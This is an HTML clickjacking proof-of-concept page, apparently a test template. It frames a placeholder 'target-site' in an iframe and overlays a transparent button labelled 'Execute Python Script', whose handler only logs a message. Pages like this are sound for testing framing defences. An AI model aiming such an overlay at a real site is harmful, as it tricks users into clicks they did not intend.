<html>
    <head>
        <style>             
            iframe{
                top: 0;
                left: 0;
                width: 100%;
                height: 1000px;
                border: none;
            }
            button{
                top: 310px;
                color: black;
                left: 1200px;
                border-color: white;
                /* flex: 4; */
                min-height: 450px;
                background-color: transparent;
                position: absolute;             
                flex-direction: column;
                justify-content: center;
                /* line-height: 1.5; */
                width: 21%;
                /* margin-bottom: 20px; */
                /* filter: drop-shadow(2px 4px 8px var(--shadowColor)); */
                /* z-index: 2; */
                overflow: hidden;
            }

        </style>
        <title>Clickjacking page</title>
    </head>
    <body>
        <!-- Your visible content here -->  
        <iframe sandbox="allow-modals allow-forms allow-popups allow-same-origin allow-scripts"
        style="opacity: 10"
        src="target-site" height="500" width="500">
    </iframe>
    <button id="executeScriptButton">Execute Python Script</button>

    <!-- JavaScript to handle click event -->
         <script>
        document.getElementById("executeScriptButton").addEventListener("click", function() {
            // Execute your Python script here

                    console.log("Script executed");
                    // Hide the button if execution is successful
                    document.getElementById("executeScriptButton").style.display = "none";
                // }
            // };
        });
   
      </script>
       
    </body>
</html>